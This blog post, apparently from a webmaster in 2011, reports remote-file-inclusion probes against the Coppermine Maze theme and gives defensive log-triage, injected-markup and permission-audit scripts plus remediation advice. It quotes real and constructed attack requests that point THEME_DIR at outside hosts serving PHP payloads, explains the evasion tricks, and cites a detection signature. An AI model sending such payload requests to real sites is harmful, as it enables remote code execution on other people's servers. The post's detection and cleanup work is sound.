Huge Coppermine Maze Theme Attack on Aug 21-22, 2011
I have detected a huge exploit probe attack against the Maze theme interface for Coppermine web photo galleries, targeting my blog. Hundreds of probes were launched tonight, August 21 through 22, 2011, from the IP address 64.31.60.72 - a static IP which belongs to Limestone Networks, in Dallas, Texas.
Here is a tiny excerpt of the attack. The probe targets a remote file inclusion hole in the Coppermine Maze theme: the theme script builds an include path from the THEME_DIR request parameter, so pointing that parameter at an attacker-controlled URL makes a vulnerable, unpatched Coppermine install fetch and execute hostile PHP code inside the blog or photo gallery:
64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
Note that the URL hosting the exploit code is http://184.22.121.212, which resolves to 184-22-121-212.static.hostnoc.net. The .jpg extension is only a disguise: PHP's include() executes whatever text the remote server returns, whatever the file is called, and the trailing ?? turns anything theme.php appends after THEME_DIR into a harmless query string for the attacker's server. The probe matches the signature listed in the RFI (Remote File Inclusion) Vulnerabilities Scanner on the OSSEC Wiki: "$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";". According to Security Tracker, this exploit has been in the wild since April 2004.
If you run the Coppermine Photo Gallery software on a website under your control, search your access logs for requests to themes/maze/theme.php with THEME_DIR set to a URL. Then look at the server response codes. A 403, 404 or 405 means the request was refused or the script is not there (I feed them a Server 405: Method Not Allowed). A 200 means theme.php actually ran the request, so treat that install as probably compromised until you have proven otherwise. Next, log into your Coppermine admin panel and go over every setting to see whether anything has been changed without your knowledge. Visit your gallery in Firefox with the NoScript add-on installed and active, view the source of your gallery pages, and read through all of it (Control + A highlights everything). Look for 1x1 pixel or hidden iframes linking to outside websites, and for other injected code such as unfamiliar JavaScript or meta refresh redirects.
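The log check and the page-source check described above, as a small Python script. This is an added example, not code from the original post: it assumes Apache-style combined access logs, and apart from the first log line (the one quoted in the post) the sample log lines and the sample HTML are constructed for the demo, with placeholder host names.

```python
"""Triage helpers for the Coppermine Maze-theme RFI probe discussed above.

Added example, not code from the original post.  Assumes Apache combined log
format.  Apart from the first (quoted from the post), the log lines and the
HTML below are constructed for the demo; hosts in them are placeholders.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log: ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
PROBE_SCRIPT = "/modules/coppermine/themes/maze/theme.php"
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_rfi_probes(log_lines):
    """One record per request that points THEME_DIR at a remote URL.

    200 only proves theme.php executed; whether the remote file was really
    included depends on allow_url_include, so those rows are INVESTIGATE rather
    than 'compromised'.  5xx means the script ran and failed (check the error
    log); anything else means the request was refused or the script is absent.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith(PROBE_SCRIPT):
            continue
        theme_dir = parse_qs(query, keep_blank_values=True).get("THEME_DIR", [""])[0]
        if not theme_dir.lower().startswith(REMOTE_SCHEMES):
            continue  # local path or empty: not remote inclusion
        # Attackers append '?' (here '??') so whatever theme.php concatenates
        # after THEME_DIR becomes a query string on their own server.
        payload = theme_dir.rstrip("?")
        status = int(m.group("status"))
        verdict = "INVESTIGATE" if status == 200 else "ERROR" if status >= 500 else "BLOCKED"
        hits.append({
            "source_ip": m.group("ip"), "time": m.group("time"), "status": status,
            "payload_host": urlsplit(payload).hostname, "payload_url": payload,
            "verdict": verdict,
        })
    return hits


IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# width/height of exactly 0 or 1 (optionally 'px'), followed by space, '>' or '/'
TINY_DIM_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?\s*[01](?:px)?\s*["']?(?=[\s>/])""", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
META_REFRESH_RE = re.compile(r"""<meta\b[^>]*http-equiv\s*=\s*["']?refresh\b[^>]*>""", re.I)


def find_injected_markup(html):
    """Return (kind, tag) for the usual injected carriers: 1x1 or hidden
    iframes and meta-refresh redirects.  Normal embeds (e.g. 560x315) pass."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        if len(TINY_DIM_RE.findall(tag)) == 2 or HIDDEN_RE.search(tag):
            findings.append(("hidden-iframe", tag))
    for m in META_REFRESH_RE.finditer(html):
        findings.append(("meta-refresh", m.group(0)))
    return findings


SAMPLE_LOG = [
    '64.31.60.72 - - [21/Aug/2011:14:55:18 -0600] "GET /blogs/2009/11//modules/coppermine/themes/maze/theme.php?THEME_DIR=http://184.22.121.212:60000/byroe.jpg?? HTTP/1.1" 405 766 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"',
    # constructed: same probe where theme.php answered 200
    '203.0.113.9 - - [22/Aug/2011:01:02:03 -0600] "GET /gallery/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://198.51.100.7/shell.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"',
    # constructed: ordinary traffic, and a local-path probe (not RFI)
    '198.51.100.20 - - [22/Aug/2011:01:05:00 -0600] "GET /gallery/displayimage.php?pid=42 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
    '198.51.100.21 - - [22/Aug/2011:01:06:00 -0600] "GET /gallery/modules/coppermine/themes/maze/theme.php?THEME_DIR=../../etc HTTP/1.1" 404 300 "-" "curl/7.21"',
]
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="0;url=http://redirect.invalid/go.php">
</head><body>
<iframe src="https://video.example/embed/abc" width="560" height="315"></iframe>
<iframe src="http://payload.invalid/in.php" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://payload.invalid/x.php" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(hit)
    for kind, tag in find_injected_markup(SAMPLE_HTML):
        print(kind, tag)
```

Run it against your real log with `find_rfi_probes(open("access_log"))` and against saved page source with `find_injected_markup(open("index.html").read())`; the regexes are deliberately loose on spacing and quoting because injected markup is rarely tidy.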
Remove any hostile changes, then save the cleaned pages. Check the permissions on your files to make sure they are writable only by the Owner (you), not by Group or World. 644 (rw-r--r--: read and write for the owner, read-only for group and world) is the safe setting for HTML, script and PHP files. Look for updates for Coppermine and for any themes you use with it. Notify your web host of the exploit and have them run a vulnerability scan on the rest of your pages and clean up anything you overlooked.
If you use an FTP client to upload files to your website, you can set permissions on each remote file. Check the Help file that comes with the FTP program. In WS_FTP, on a Linux/Unix host, there is a right-click option labeled Properties, which opens a box for setting the numeric or per-action permissions of any selected file or group of selected files. Clicking OK after changing permissions applies the change. If you see PHP or HTML files with 664 or 666 permissions, change them to 644, unless you know they genuinely need to be writable by Group or World (aka Everyone).
If you use a web interface to manage files on your server, check the instructions for how to set or change file permissions on the server.
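A permission audit for the 644 advice above, as an added Python example that is not part of the original post. It assumes a Unix host on which you own the files (shell access or a host that lets you run scripts); the demo tree it builds is constructed. Review the report before applying it: directories the gallery writes uploads into (Coppermine's albums/ tree, for instance) legitimately need to be writable by the web server user, so do not chmod blindly.

```python
"""Audit web files for group/world write permission and reset them to 0644.

Added example, not code from the original post.  Assumes a Unix host on which
you own the files; the tree built by build_demo_tree() is constructed.
"""
import os
import stat
import tempfile

WEB_EXTENSIONS = (".php", ".html", ".htm", ".js", ".css")
SAFE_MODE = 0o644  # rw-r--r--


def find_writable(root, extensions=WEB_EXTENSIONS):
    """Sorted [(path, mode)] for regular files under root whose mode lets
    Group or World write to them (the 664/666 cases from the post)."""
    offenders = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks
            if not stat.S_ISREG(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                offenders.append((path, mode))
    return sorted(offenders)


def fix_permissions(root, mode=SAFE_MODE, dry_run=True):
    """Reset every offender to `mode`; with dry_run=True only report.
    Returns the paths changed (or that would be changed)."""
    changed = []
    for path, old_mode in find_writable(root):
        print(f"{oct(old_mode)} -> {oct(mode)}  {path}{'  (dry run)' if dry_run else ''}")
        if not dry_run:
            os.chmod(path, mode)
        changed.append(path)
    return changed


def build_demo_tree(root):
    """Constructed sample: two offending web files, one clean, one non-web file."""
    os.makedirs(os.path.join(root, "themes", "maze"))
    samples = {
        "index.php": 0o666,              # world-writable: bad
        "themes/maze/theme.php": 0o664,  # group-writable: bad
        "displayimage.php": 0o644,       # fine
        "notes.txt": 0o666,              # not a web file: ignored by this audit
    }
    for rel, mode in samples.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("<?php // sample ?>\n")
        os.chmod(path, mode)


def run_demo():
    """Build the tree, report, fix, re-check.  Returns (before, after) paths."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        before = [os.path.relpath(p, root) for p, _ in find_writable(root)]
        fix_permissions(root, dry_run=False)
        after = [os.path.relpath(p, root) for p, _ in find_writable(root)]
    return before, after


if __name__ == "__main__":
    print(run_demo())
```

On a real site run `fix_permissions("/path/to/htdocs")` first with the default dry run, read the list, then repeat with `dry_run=False` once you are satisfied nothing in it needs to stay writable.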
According to the Coppermine home page news, the latest stable version containing security patches is cpg1.5.12 (Security release - upgrade mandatory!), dated 02 January 2011, and there is a very recent maintenance release, cpg1.5.14, dated August 1, 2011. I advise you to upgrade to the latest version on the Coppermine home page if you are running anything older. Get on their mailing list to be notified about security updates as they are issued.
Stay safe and keep your website safe for your visitors. As a Webmaster you must practice safe Hex! Do not assume that your web host will update software you have chosen to install. They won't do anything except shut down your account when it gets reported for infecting innocent visitors. If you don't know how to update web software, call your web host, ask for technical support and request assistance updating your galleries, blogs, themes, etc. They may charge you a fee, or not. You install it, you update it! It gets hacked, you fix it!
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.